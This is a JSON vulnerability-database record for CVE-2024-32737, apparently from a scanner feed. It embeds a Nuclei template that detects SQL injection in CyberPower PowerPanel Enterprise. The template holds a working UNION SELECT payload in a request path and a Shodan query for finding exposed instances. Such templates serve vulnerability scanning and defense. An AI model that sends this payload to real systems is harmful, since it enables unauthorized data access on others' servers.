{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-32737/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-32737/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-32737/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-32737/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-32737/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-32737"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-32737"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-32737.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2024-32737\n\ninfo:\n  name: CyberPower - SQL Injection\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n  remediation: |\n    Apply the latest security patches and updates from the vendor to address this vulnerability.\n  impact: |\n    An unauthenticated remote attacker can leak sensitive information via the \"query_contract_result\" function within MCUDBHelper.\n  reference:\n    - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote\n    - https://www.tenable.com/security/research/tra-2024-14\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-32737\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-32737\n    cwe-id: CWE-89\n    epss-score: 0.05408\n    epss-percentile: 0.9234\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"<title>PDNU</title>\"\n  tags: cve,cve2024,cyberpower,sqli,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - ':\"finished\"'\n          - '\"success\":'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        group: 1\n        regex:\n          - '\"modifiedtime\":\"([0-9.]+)\"'\n# digest: 4a0a00473045022100951c4c0e80b67345e8c3a4677f9db47f77c200b0126c8033ceeaff689a643b7902204bd44201abea93586f96b55c640dd0578b44ddebf4c80f1d88b2f3164f75b484:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-32737"
}